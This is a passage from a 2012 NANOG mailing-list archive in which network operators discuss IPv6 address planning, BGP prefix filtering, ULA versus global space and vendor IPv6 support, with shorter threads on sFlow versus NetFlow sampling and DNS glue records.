secure" but the security model of v6 is different. 1918 was never more
secure.

     -- Brett

From valdis.kletnieks at vt.edu  Sun Jul 15 10:44:50 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Sun, 15 Jul 2012 11:44:50 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: Your message of "Sat, 14 Jul 2012 17:37:37 -0500."
References: <52169.1342301812@turing-police.cc.vt.edu>
Message-ID: <97527.1342367090@turing-police.cc.vt.edu>

On Sat, 14 Jul 2012 17:37:37 -0500, Jimmy Hess said:
> The good news is one 'ifconfig' just tells them what network
> address you're in.
> Unless the attacker can gain access to your host's NDP table or ARP
> table, they can't see what IPs are in use.

All it takes is one USB stick left out in the parking lot for an employee.. By the time they get enough access to do an 'ifconfig', rest assured that they can see the NDP/ARP tables and all the traffic on that network segment as well. (OK.. maybe for some reason they can't - but if you're betting your security model on somebody getting a beachhead on one of your machines and *not* having full access to the network segment, I'll be more than happy to take the other side of the bet).

From Grzegorz at Janoszka.pl Sun Jul 15 10:58:20 2012
From: Grzegorz at Janoszka.pl (Grzegorz Janoszka)
Date: Sun, 15 Jul 2012 17:58:20 +0200
Subject: using "reserved" IPv6 space
In-Reply-To: <5002C5F5.4040505@emanon.com>
References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com>
Message-ID: <5002E89C.1040801@Janoszka.pl>

On 2012-07-15 15:30, Scott Morris wrote:
>> There was also in the past fec0::/10. For BGP updates you should be safe
>> to filter out FC00::/6.
> Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So
> while FE00::/7 may yet be unallocated, I don't think I'd set filters in
> that fashion.
> Reasonably, wouldn't it be more likely to permit BGP advertisements
> within the 2000::/3 range as that's the "active" space currently?

FF00::/8 are multicast, FE80::/10 are reserved for link-local. In the past you had FEC0::/10 as a kind of private addresses.

Allowing 2000::/3 is fine as well. Btw - what are the estimates - how long are we going to be within 2000::/3?
--
Grzegorz Janoszka

From mike at mikejones.in Sun Jul 15 12:22:04 2012
From: mike at mikejones.in (Mike Jones)
Date: Sun, 15 Jul 2012 18:22:04 +0100
Subject: using "reserved" IPv6 space
In-Reply-To: <5002E89C.1040801@Janoszka.pl>
References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> <5002E89C.1040801@Janoszka.pl>
Message-ID:

On 15 July 2012 16:58, Grzegorz Janoszka wrote:
> Allowing 2000::/3 is fine as well. Btw - what are the estimates - how
> long are we going to be within 2000::/3?
>

I expect it to be long enough that we can enjoy lots of discussions about how to deal with broken route filtering and broken software that assumes only 2000::/3 is valid, and we can talk about how we should have seen this coming and done something differently to prevent it.

- Mike

From owen at delong.com Sun Jul 15 14:22:14 2012
From: owen at delong.com (Owen DeLong)
Date: Sun, 15 Jul 2012 12:22:14 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <5002E89C.1040801@Janoszka.pl>
References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> <5002E89C.1040801@Janoszka.pl>
Message-ID: <1FFE1C96-A0E4-4B94-A9DF-D586A7321D80@delong.com>

On Jul 15, 2012, at 8:58 AM, Grzegorz Janoszka wrote:
> On 2012-07-15 15:30, Scott Morris wrote:
>>> There was also in the past fec0::/10. For BGP updates you should be safe
>>> to filter out FC00::/6.
>> Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So
>> while FE00::/7 may yet be unallocated, I don't think I'd set filters in
>> that fashion.
>> Reasonably, wouldn't it be more likely to permit BGP advertisements
>> within the 2000::/3 range as that's the "active" space currently?
>
> FF00::/8 are multicast, FE80::/10 are reserved for link-local. In the
> past you had FEC0::/10 as a kind of private addresses.
>
> Allowing 2000::/3 is fine as well. Btw - what are the estimates - how
> long are we going to be within 2000::/3?

Quite probably longer than anyone now reading this message will be alive.

So far, I believe IANA has allocated 6 or 7 of the /12s from 2000::/3 to RIRs. That leaves at least 500+ /12s still to go. Even with ARIN's extremely liberal policies, I expect ARIN will be able to number all of their service region in its current state from 3 or 4 /12s. Assuming this somewhat follows world population, APNIC should require <=12 /12s, RIPE should need <= 6 /12s, AfriNIC should require <= 6 /12s, and LACNIC should require <= 4 /12s. Adding that up, I get 4+12+6+6+4 = 32 /12s if the entire world were to adopt ARIN's extremely liberal (which I think is a good thing) IPv6 allocation policies.

Assuming that the world population (and thus address need) continues on a 1.5% per year growth trajectory, that would double the population every 46+ years. With a lifespan of ~100 years and assuming that everyone reading this is now over the age of 10, that's 4*32 = 128 /12s in the next 92 years, leaving us with 384 /12s still sitting on the shelf after the last of us now reading this message is dead.

So, even if I'm wrong and it's 3 times what I anticipate, we still won't use up 2000::/3 in any of our lifetimes.

Owen

From nick at foobar.org Sun Jul 15 15:52:50 2012
From: nick at foobar.org (Nick Hilliard)
Date: Sun, 15 Jul 2012 21:52:50 +0100
Subject: Real world sflow vs netflow?
In-Reply-To: <50012E21.4060802@bromirski.net>
References: <50012E21.4060802@bromirski.net>
Message-ID: <50032DA2.9020108@foobar.org>

On 14/07/2012 09:30, Łukasz Bromirski wrote:
> And that's the biggest problem with sFlow. Packets are sampled, not
> flows. You may miss the big or important flow, you don't have
> visibility into every conversation going through the device.

Unless you enable sampling, which is pretty much necessary for non-trivial traffic volumes.

> NetFlow supports IPv6.
> As well as L2 traffic (v9), MPLS, multicast and
> so on.

It does, depending on hardware variety, but you need specific platform support for each packet variety (v4 / v6 / mpls / etc), and platform support for this can be very dodgy. You don't need this with sflow - it just punts 1 in N raw packets out to your collector, and the statistical assumptions which were made by the networking device are well documented. I've never seen documentation on the sampling technique used for each netflow implementation.

> The measurements provided by sFlow are only an approximation of the real
> traffic and while it may be acceptable on LAN links where details don't
> matter as much, it's hardly good enough to present a real view on the
> WAN links.
>
> sFlow was built to work on switches and provide "some" accuracy, it's
> not good enough (unless you do sampling on a 1:5-1:10 basis) to
> do billing or some detailed analysis of traffic:

Depends on how detailed your requirements are. For billing, most people don't classify by packet analysis, but rather by byte count which can be handled by snmp port counters. If you need to do something fancier, non-sampled netflow is indeed good enough for billing.

> http://www.inmon.com/pdf/sFlowBilling.pdf
>
> You can use it to *estimate* the traffic, detect DDoS, sure. But the
> data & scaling used by sFlow (and additionally tricks used by ASIC
> vendors implementing it in the hardware) can't change the fundamental
> difference - sFlow is really sPacket, as it doesn't deal with flows.

agreed, the name is wrong.

> NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling
> accuracy and things like that, but working with flows is more accurate.

Depends on your use case. For large traffic values, you run into the law of large numbers and you can get accurate visibility into what's happening on your network.

Certainly, netflow _can_ offer amazingly precise visibility into your network.
But the trade-off is that you need specialised hardware to do this on your line cards or your forwarding engine. This drives up both the capex (extra hardware) and the opex (tcam is power hungry) of your network. sflow is much cheaper to implement as you're not maintaining any state on your chassis. You're just picking out a packet every so often.

The current generation of high end service provider hardware (juniper mx-3d, cisco sup2t / n7k / asr9k) is pretty much the first generation of hardware which doesn't have crippling netflow limitations, such as poor support for v6 / mpls, too small cache sizes, etc. This fact alone should provide a good indication of how difficult it is to implement it well on fast boxes.

sflow is simpler, cheaper and in many cases is simply a better choice if you don't need drill-down into every single flow going through your network.

Nick

From swm at emanon.com Sun Jul 15 17:21:09 2012
From: swm at emanon.com (Scott Morris)
Date: Sun, 15 Jul 2012 18:21:09 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: <5002E89C.1040801@Janoszka.pl>
References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> <5002E89C.1040801@Janoszka.pl>
Message-ID: <50034255.9090700@emanon.com>

On 7/15/12 11:58 AM, Grzegorz Janoszka wrote:
> On 2012-07-15 15:30, Scott Morris wrote:
>>> There was also in the past fec0::/10. For BGP updates you should be safe
>>> to filter out FC00::/6.
>> Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So
>> while FE00::/7 may yet be unallocated, I don't think I'd set filters in
>> that fashion.
>> Reasonably, wouldn't it be more likely to permit BGP advertisements
>> within the 2000::/3 range as that's the "active" space currently?
> FF00::/8 are multicast, FE80::/10 are reserved for link-local. In the
> past you had FEC0::/10 as a kind of private addresses.
>
> Allowing 2000::/3 is fine as well.
> Btw - what are the estimates - how
> long are we going to be within 2000::/3?
>

hehehhe.. Long enough for us to forget what prefix lists we put on to begin with and need to look them back up!

From kmedcalf at dessus.com Sun Jul 15 18:55:44 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Sun, 15 Jul 2012 17:55:44 -0600
Subject: Re: using "reserved" IPv6 space
Message-ID:

Ifconfig does not work on Windows.

Are you saying that there are other operating systems brain-dead enough to just run any old arbitrary code from untrusted media?

Sent from my Android phone using TouchDown (www.nitrodesk.com)

-----Original Message-----
From: [valdis.kletnieks at vt.edu]
Received: Sunday, 15 Jul 2012, 9:45
To: Jimmy Hess [mysidia at gmail.com]
CC: [nanog at nanog.org]; Brandon Ross [bross at pobox.com]
Subject: Re: using "reserved" IPv6 space

On Sat, 14 Jul 2012 17:37:37 -0500, Jimmy Hess said:
> The good news is one 'ifconfig' just tells them what network
> address you're in.
> Unless the attacker can gain access to your host's NDP table or ARP
> table, they can't see what IPs are in use.

All it takes is one USB stick left out in the parking lot for an employee.. By the time they get enough access to do an 'ifconfig', rest assured that they can see the NDP/ARP tables and all the traffic on that network segment as well. (OK.. maybe for some reason they can't - but if you're betting your security model on somebody getting a beachhead on one of your machines and *not* having full access to the network segment, I'll be more than happy to take the other side of the bet).

From randy at psg.com Sun Jul 15 18:58:39 2012
From: randy at psg.com (Randy Bush)
Date: Mon, 16 Jul 2012 08:58:39 +0900
Subject: using "reserved" IPv6 space
In-Reply-To:
References:
Message-ID:

> Ifconfig does not work on Windows.

i am about as far from a windows expert as you can get.
but i believe it is ipconfig

> Are you saying that there are other operating systems brain-dead
> enough to just run any old arbitrary code from untrusted media?
>
> Sent from my Android phone

ROFL!

randy

From mysidia at gmail.com Sun Jul 15 19:24:18 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Sun, 15 Jul 2012 19:24:18 -0500
Subject: using "reserved" IPv6 space
In-Reply-To:
References:
Message-ID:

On 7/15/12, Keith Medcalf wrote:
> Ifconfig does not work on Windows.

Who needs ifconfig with windows? any user who can open a cmd session can run IPCONFIG /ALL

The same can be queried remotely using WMI

Select * From Win32_NetworkAdapterConfiguration WHERE IPEnabled=true

> Are you saying that there are other operating systems brain-dead enough to
> just run any old arbitrary code from untrusted media?

That depends... what do you mean by untrusted media?

Many OSes, even certain versions of Linux that support Firewire can be coerced into running arbitrary code, by plugging in a malicious firewire device, unless there is an IOMMU or other measures protecting against malicious memory access when a DMA is requested.

Various hardware devices, and drivers have vulnerabilities, even without 'autoplay'. And some *ix distros do support 'autoplay-like' functionality.

> Sent from my Android phone using TouchDown (www.nitrodesk.com)

--
-JH

From valdis.kletnieks at vt.edu Sun Jul 15 21:51:23 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Sun, 15 Jul 2012 22:51:23 -0400
Subject: Re: using "reserved" IPv6 space
In-Reply-To: Your message of "Sun, 15 Jul 2012 17:55:44 -0600."
References:
Message-ID: <123328.1342407083@turing-police.cc.vt.edu>

On Sun, 15 Jul 2012 17:55:44 -0600, "Keith Medcalf" said:
> Are you saying that there are other operating systems brain-dead enough to
> just run any old arbitrary code from untrusted media?

As Vint Cerf pointed out, 140 million pwned boxes.
How do you think they got that way, and what are the chances that *none* of them are inside your net?

From ler762 at gmail.com Sun Jul 15 22:35:17 2012
From: ler762 at gmail.com (Lee)
Date: Sun, 15 Jul 2012 23:35:17 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: <86a9z1hjzy.fsf@seastrom.com>
References: <86a9z1hjzy.fsf@seastrom.com>
Message-ID:

On 7/14/12, Robert E. Seastrom wrote:
>
> Actually, that's one of the most insightful meta-points I've seen on
> NANOG in a long time.
>
> There is a HUGE difference between IPv4 and IPv6 thinking. We've all
> been living in an austerity regime for so long that we've completely
> forgotten how to leave parsimony behind. Even those of us who worked
> at companies that were summarily handed a Class B when we mumbled
> something about "internal subnetting" have a really hard time
> remembering how to act when we suddenly don't have to answer for every
> single host address and can design a network to conserve other things
> (like our brain cells).

Suggestions?

I feel like I should be able to do something really nice with an absurdly large address space. But lack of imagination or whatever.. I haven't come up with anything that really appeals to me.

Thanks,
Lee

> -Hammer- writes:
>
>>
>>
>> Thank you all. It's not the protocol that hurts. It's rethinking the
>> culture/philosophy around it.
>>
>> -Hammer-
>>
>> On 7/14/12 3:20 PM, "Owen DeLong" wrote:
>>
>>>They're a bad thing in IPv6.
>>>
>>>The only place for security through obscurity IMHO is a small round
>>>container that sits next to my desk.
>>>
>>>Besides, if you don't advertise it, a GUA prefix is just as obscure as a
>>>ULA prefix and provides a larger search space in which one has to hunt
>>>for it... Think /3 instead of /8.
>>>
>>>Owen
>>>
>>>On Jul 14, 2012, at 1:14 PM, -Hammer- wrote:
>>>
>>>> Guys,
>>>> The whole purpose of this is that they do NOT need to be global.
>>>> Security thru obscurity. It actually has a place in some worlds. Does
>>>>that
>>>> make sense? Or are such V4-centric approaches a bad thing in v6?
>>>>
>>>> On 7/13/12 8:41 PM, "Brandon Ross" wrote:
>>>>
>>>>> On Fri, 13 Jul 2012, Owen DeLong wrote:
>>>>>
>>>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>>>>>>
>>>>>>> keep life simple. use global ipv6 space.
>>>>>>>
>>>>>>> randy
>>>>>>
>>>>>> Though it is rare, this is one time when I absolutely agree with
>>>>>>Randy.
>>>>>
>>>>> It's even more rare for me to agree with Randy AND Owen at the same
>>>>>time.
>>>>>
>>>>> --
>>>>> Brandon Ross Yahoo & AIM:
>>>>> BrandonNRoss
>>>>> +1-404-635-6667 ICQ:
>>>>> 2269442
>>>>> Schedule a meeting: https://tungle.me/bross Skype:
>>>>> brandonross
>>>>>
>>>>
>>>>
>>>
>
>

From johnl at iecc.com Sun Jul 15 22:58:12 2012
From: johnl at iecc.com (John Levine)
Date: 16 Jul 2012 03:58:12 -0000
Subject: using "reserved" IPv6 space
In-Reply-To:
Message-ID: <20120716035812.87659.qmail@joyce.lan>

>I feel like I should be able to do something really nice with an
>absurdly large address space. But lack of imagination or whatever.. I
>haven't come up with anything that really appeals to me.

Use a fresh IP for every HTTP request, email message, and IM. Just think of how well you can do error management.

R's,
John

From jabley at hopcount.ca Mon Jul 16 09:03:54 2012
From: jabley at hopcount.ca (Joe Abley)
Date: Mon, 16 Jul 2012 10:03:54 -0400
Subject: Netsol AAAA glue
In-Reply-To: <20120714060659.GA46015@geeks.org>
References: <20120714060659.GA46015@geeks.org>
Message-ID: <9B85A2EA-D892-42B0-8409-78998161F390@hopcount.ca>

On 2012-07-14, at 02:06, Doug McIntyre wrote:
> OpenSRS does (now) have online IPv6 glue-record editing.
>
> They can insert DS records by hand if you email into their support
> department (assuming you are the reseller and you have access to their
> support department, otherwise you have to work through your reseller).

For COM and NET only. Not ORG, not any ccTLDs, as far as I know.

Joe

From bhmccie at gmail.com Mon Jul 16 10:11:48 2012
From: bhmccie at gmail.com (-Hammer-)
Date: Mon, 16 Jul 2012 10:11:48 -0500
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <86a9z1hjzy.fsf@seastrom.com>
Message-ID: <50042F34.5080007@gmail.com>

There are multiple issues here. I understand most folks on these threads are beyond me but I'm pretty sure I'm not the only person in this position.

1) (This one is currently a personal issue) I am still building up a true IPv6 skillset. Yes, I understand it for the most part but now is the time to apply it.

2) All the reading you do doesn't prepare you for application and the vendors aren't necessarily helping. Feature parity across platforms and vendors beyond just "interface x/x/x" and "ipv6 address fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to take what I understand and apply it beyond the basics I often see hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If it's working for you hit me offline. Example2? Any vendor product beyond a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN guys may be rolling deep in IPv6 but not everyone else. I just got an EA this morning from CheckPoint for NAT66. This should have been ready for prime time years ago. I guess the vendors weren't getting the push from the customers so there was no need to make an effort....

3) When I'm not preoccupied attempting to digest the fundamentals I am well aware of the retooling of the brain that is required for this in a network design. Last year I reached out to Team Cymru and attempted to build an IPv6 router template to match their IPv4 template. It was a completely different animal.
Ironically most of the STIGs and NSA reference garbage I used was ten years old but still applied. After going thru all those docs my brain hurt trying to orient my ACLs properly and go thru all the different attributes you want to block where and when. Then I spent some time trying to work our design schemas for our ARIN space with the WAN design team.

What I'm trying to say is that Robert's comments are spot on. It is a very different way of thinking on a small scale and a large scale and you can't take your IPv4 logic and apply it. I've tried and it's just slowing me down.

-Hammer-

"I was a normal American nerd"
-Jack Herer

On 7/15/2012 10:35 PM, Lee wrote:
> On 7/14/12, Robert E. Seastrom wrote:
>> Actually, that's one of the most insightful meta-points I've seen on
>> NANOG in a long time.
>>
>> There is a HUGE difference between IPv4 and IPv6 thinking. We've all
>> been living in an austerity regime for so long that we've completely
>> forgotten how to leave parsimony behind. Even those of us who worked
>> at companies that were summarily handed a Class B when we mumbled
>> something about "internal subnetting" have a really hard time
>> remembering how to act when we suddenly don't have to answer for every
>> single host address and can design a network to conserve other things
>> (like our brain cells).
> Suggestions?
>
> I feel like I should be able to do something really nice with an
> absurdly large address space. But lack of imagination or whatever.. I
> haven't come up with anything that really appeals to me.
>
> Thanks,
> Lee
>
>
>> -Hammer- writes:
>>
>>>
>>>
>>> Thank you all. It's not the protocol that hurts. It's rethinking the
>>> culture/philosophy around it.
>>>
>>> -Hammer-
>>>
>>> On 7/14/12 3:20 PM, "Owen DeLong" wrote:
>>>
>>>> They're a bad thing in IPv6.
>>>>
>>>> The only place for security through obscurity IMHO is a small round
>>>> container that sits next to my desk.
>>>>
>>>> Besides, if you don't advertise it, a GUA prefix is just as obscure as a
>>>> ULA prefix and provides a larger search space in which one has to hunt
>>>> for it... Think /3 instead of /8.
>>>>
>>>> Owen
>>>>
>>>> On Jul 14, 2012, at 1:14 PM, -Hammer- wrote:
>>>>
>>>>> Guys,
>>>>> The whole purpose of this is that they do NOT need to be global.
>>>>> Security thru obscurity. It actually has a place in some worlds. Does
>>>>> that
>>>>> make sense? Or are such V4-centric approaches a bad thing in v6?
>>>>>
>>>>> On 7/13/12 8:41 PM, "Brandon Ross" wrote:
>>>>>
>>>>>> On Fri, 13 Jul 2012, Owen DeLong wrote:
>>>>>>
>>>>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>>>>>>>
>>>>>>>> keep life simple. use global ipv6 space.
>>>>>>>>
>>>>>>>> randy
>>>>>>> Though it is rare, this is one time when I absolutely agree with
>>>>>>> Randy.
>>>>>> It's even more rare for me to agree with Randy AND Owen at the same
>>>>>> time.
>>>>>>
>>>>>> --
>>>>>> Brandon Ross Yahoo & AIM:
>>>>>> BrandonNRoss
>>>>>> +1-404-635-6667 ICQ:
>>>>>> 2269442
>>>>>> Schedule a meeting: https://tungle.me/bross Skype:
>>>>>> brandonross
>>>>>>
>>>>>
>>

From rcarpen at network1.net Mon Jul 16 10:21:19 2012
From: rcarpen at network1.net (Randy Carpenter)
Date: Mon, 16 Jul 2012 11:21:19 -0400 (EDT)
Subject: IPv6 Toolkit v1.2: Latest snapshot, and git repo
In-Reply-To: <5002DA03.6060007@gont.com.ar>
Message-ID: <1123039916.37623.1342452079021.JavaMail.root@network1.net>

Appears to compile fine on Mac OS X 10.7. The resulting programs run, but I have not tried any real testing with actual data.

thanks,
-Randy

----- Original Message -----
> Folks,
>
> I've posted a snapshot (tarball) of my working copy of the IPv6
> toolkit. The tarball is available at:
>
>
> Additionally, I've created a git repository for the toolkit, such
> that
> collaboration is improved.
> The git repo is available at:
>
>
> If you have access to a Mac OS box, please try to compile the tools,
> and let me know if you find any errors (or let me know if they
> compiled cleanly). If you can also run the tools according to some of
> the examples in the manuals (and report any problems), that would be
> great, too.
>
> P.S.: If you've sent patches and your patches have not yet been
> applied, most likely it just means that I'm catching-up with them
> (feel free to resend!).
>
> Thanks!
>
> Best regards,
> --
> Fernando Gont
> e-mail: fernando at gont.com.ar || fgont at si6networks.com
> PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1
>
>

From owen at delong.com Mon Jul 16 10:43:00 2012
From: owen at delong.com (Owen DeLong)
Date: Mon, 16 Jul 2012 08:43:00 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <50042F34.5080007@gmail.com>
References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com>
Message-ID: <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com>

On Jul 16, 2012, at 8:11 AM, -Hammer- wrote:
> There are multiple issues here. I understand most folks on these threads are beyond me but I'm pretty sure I'm not the only person in this position.
>
> 1) (This one is currently a personal issue) I am still building up a true IPv6 skillset. Yes, I understand it for the most part but now is the time to apply it.
Frankly, IMHO, the best way to build up a truly useful IPv6 skill set is to start applying what you don't know and see what happens. For the most part, you will find that it is truly "96 more bits, no magic".

> 2) All the reading you do doesn't prepare you for application and the vendors aren't necessarily helping. Feature parity across platforms and vendors beyond just "interface x/x/x" and "ipv6 address fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to take what I understand and apply it beyond the basics I often see hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If it's working for you hit me offline. Example2? Any vendor product beyond a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN guys may be rolling deep in IPv6 but not everyone else. I just got an EA this morning from CheckPoint for NAT66. This should have been ready for prime time years ago. I guess the vendors weren't getting the push from the customers so there was no need to make an effort....

You probably meant 2001:db8:b1aa:b1aa::babe:1 ;-) (blah isn't hex and fe80::/10 is link local. 2001:db8::/16 is the example prefix)

For the most part, HSRP really isn't even necessary or useful in IPv6 since ND should take care of what HSRP did for IPv4.

I believe F5 has rolled out IPv6 in a subset of their products and that you need pretty recent versions to get IPv6 functionality from them. The ARIN Wiki (http://www.getipv6.info) may be a good source of information on various vendor statuses. Contribute what you know/find out there as well, please.

Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being able to eliminate NAT. NAT was a necessary evil for IPv4 address conservation. It has no good use in IPv6.

> 3) When I'm not preoccupied attempting to digest the fundamentals I am well aware of the retooling of the brain that is required for this in a network design.
> Last year I reached out to Team Cymru and attempted to build an IPv6 router template to match their IPv4 template. It was a completely different animal. Ironically most of the STIGs and NSA reference garbage I used was ten years old but still applied. After going thru all those docs my brain hurt trying to orient my ACLs properly and go thru all the different attributes you want to block where and when. Then I spent some time trying to work our design schemas for our ARIN space with the WAN design team.
>
> What I'm trying to say is that Robert's comments are spot on. It is a very different way of thinking on a small scale and a large scale and you can't take your IPv4 logic and apply it. I've tried and it's just slowing me down.

Yes and no. If you have been doing IPv4 long enough to remember pre-NAT IPv4, then, you just need to remember some of the old ways of IPv4. If you have no recollection of IPv4 without NAT, then, you are correct, it is a huge paradigm shift to go back to the way the internet is supposed to have been before we ran out of addresses.

Owen

>
>
> -Hammer-
>
> "I was a normal American nerd"
> -Jack Herer
>
> On 7/15/2012 10:35 PM, Lee wrote:
>> On 7/14/12, Robert E. Seastrom wrote:
>>> Actually, that's one of the most insightful meta-points I've seen on
>>> NANOG in a long time.
>>>
>>> There is a HUGE difference between IPv4 and IPv6 thinking. We've all
>>> been living in an austerity regime for so long that we've completely
>>> forgotten how to leave parsimony behind. Even those of us who worked
>>> at companies that were summarily handed a Class B when we mumbled
>>> something about "internal subnetting" have a really hard time
>>> remembering how to act when we suddenly don't have to answer for every
>>> single host address and can design a network to conserve other things
>>> (like our brain cells).
>> Suggestions?
>>
>> I feel like I should be able to do something really nice with an
>> absurdly large address space.
>> But lack of imagination or whatever.. I
>> haven't come up with anything that really appeals to me.
>>
>> Thanks,
>> Lee
>>
>>
>>> -Hammer- writes:
>>>
>>>>
>>>>
>>>> Thank you all. It's not the protocol that hurts. It's rethinking the
>>>> culture/philosophy around it.
>>>>
>>>> -Hammer-
>>>>
>>>> On 7/14/12 3:20 PM, "Owen DeLong" wrote:
>>>>
>>>>> They're a bad thing in IPv6.
>>>>>
>>>>> The only place for security through obscurity IMHO is a small round
>>>>> container that sits next to my desk.
>>>>>
>>>>> Besides, if you don't advertise it, a GUA prefix is just as obscure as a
>>>>> ULA prefix and provides a larger search space in which one has to hunt
>>>>> for it... Think /3 instead of /8.
>>>>>
>>>>> Owen
>>>>>
>>>>> On Jul 14, 2012, at 1:14 PM, -Hammer- wrote:
>>>>>
>>>>>> Guys,
>>>>>> The whole purpose of this is that they do NOT need to be global.
>>>>>> Security thru obscurity. It actually has a place in some worlds. Does
>>>>>> that
>>>>>> make sense? Or are such V4-centric approaches a bad thing in v6?
>>>>>>
>>>>>> On 7/13/12 8:41 PM, "Brandon Ross" wrote:
>>>>>>
>>>>>>> On Fri, 13 Jul 2012, Owen DeLong wrote:
>>>>>>>
>>>>>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>>>>>>>>
>>>>>>>>> keep life simple. use global ipv6 space.
>>>>>>>>>
>>>>>>>>> randy
>>>>>>>> Though it is rare, this is one time when I absolutely agree with
>>>>>>>> Randy.
>>>>>>> It's even more rare for me to agree with Randy AND Owen at the same
>>>>>>> time.
>>>>>>>
>>>>>>> --
>>>>>>> Brandon Ross Yahoo & AIM:
>>>>>>> BrandonNRoss
>>>>>>> +1-404-635-6667 ICQ:
>>>>>>> 2269442
>>>>>>> Schedule a meeting: https://tungle.me/bross Skype:
>>>>>>> brandonross
>>>>>>>
>>>>>>
>>>
>
>

From bhmccie at gmail.com Mon Jul 16 11:09:28 2012
From: bhmccie at gmail.com (-Hammer-)
Date: Mon, 16 Jul 2012 11:09:28 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com>
References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com>
Message-ID: <50043CB8.20302@gmail.com>

Inline -

-Hammer-

"I was a normal American nerd"
-Jack Herer

1) (This one is currently a personal issue) I am still building up a true IPv6 skillset. Yes, I understand it for the most part but now is the time to apply it.

Frankly, IMHO, the best way to build up a truly useful IPv6 skill set is to start applying what you don't know and see what happens. For the most part, you will find that it is truly "96 more bits, no magic".

------- Completely agree. Been playing in GNS3 on the basics and we're starting to play in a full lab soon.

> 2) All the reading you do doesn't prepare you for application and the vendors aren't necessarily helping. Feature parity across platforms and vendors beyond just "interface x/x/x" and "ipv6 address fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to take what I understand and apply it beyond the basics I often see hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If it's working for you hit me offline. Example2? Any vendor product beyond a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN guys may be rolling deep in IPv6 but not everyone else. I just got an EA this morning from CheckPoint for NAT66. This should have been ready for prime time years ago. I guess the vendors weren't getting the push from the customers so there was no need to make an effort....
You probably meant 2001:db8:b1aa:b1aa::babe:1 (blah isn't hex and fe80::/10 is link local. 2001:db8::/16 is the example prefix) ------- I stand corrected. :) For the most part, HSRP really isn't even necessary or useful in IPv6 since ND should take care of what HSRP did for IPv4. ------- On the WAN? Sure. On my Internet facing equipment? I disagree. RAs and ND and all that fun stuff needs to be suppressed. I believe F5 has rolled out IPv6 in a subset of their products and that you need pretty recent versions to get IPv6 functionality from them. The ARIN Wiki (http://www.getipv6.info) may be a good source of information on various vendor statuses. Contribute what you know/find out there as well, please. ------- Yes they have and NetScaler is running solid as well. My issues are when you go beyond basic features of any product with IPv6 things get tricky. I need content switching with redirects and whatnot and based on the few efforts I've seen so far I'm not optimistic. Again, routers and switches seem to be further ahead than other products. They all have their limits in advanced features. Back to my ASR comment. Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being able to eliminate NAT. NAT was a necessary evil for IPv4 address conservation. It has no good use in IPv6. -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there if there weren't enough customers asking for it. Are all the customers naive? I doubt it. They have their reasons. I agree with your "purist" definition and did not say I was using it. My point is that vendors are still rolling out baseline features even today. > 3) When I'm not preoccupied attempting to digest the fundamentals I am well aware of the retooling of the brain that is required for this in a network design. Last year I reached out to Team Cymru and attempted to build an IPv6 router template to match their IPv4 template. It was a completely different animal. 
Ironically most of the STIGs and NSA reference garbage I used was ten years old but still applied. After going thru all those docs my brain hurt trying to orient my ACLs properly and go thru all the different attributes you want to block where and when. Then I spent some time trying to work our design schemas for our ARIN space with the WAN design team. What I'm trying to say is that Robert's comments are spot on. It is a very different way of thinking on a small scale and a large scale and you can't take your IPv4 logic and apply it. I've tried and it's just slowing me down.

Yes and no. If you have been doing IPv4 long enough to remember pre-NAT IPv4, then, you just need to remember some of the old ways of IPv4. If you have no recollection of IPv4 without NAT, then, you are correct, it is a huge paradigm shift to go back to the way the internet is supposed to have been before we ran out of addresses.

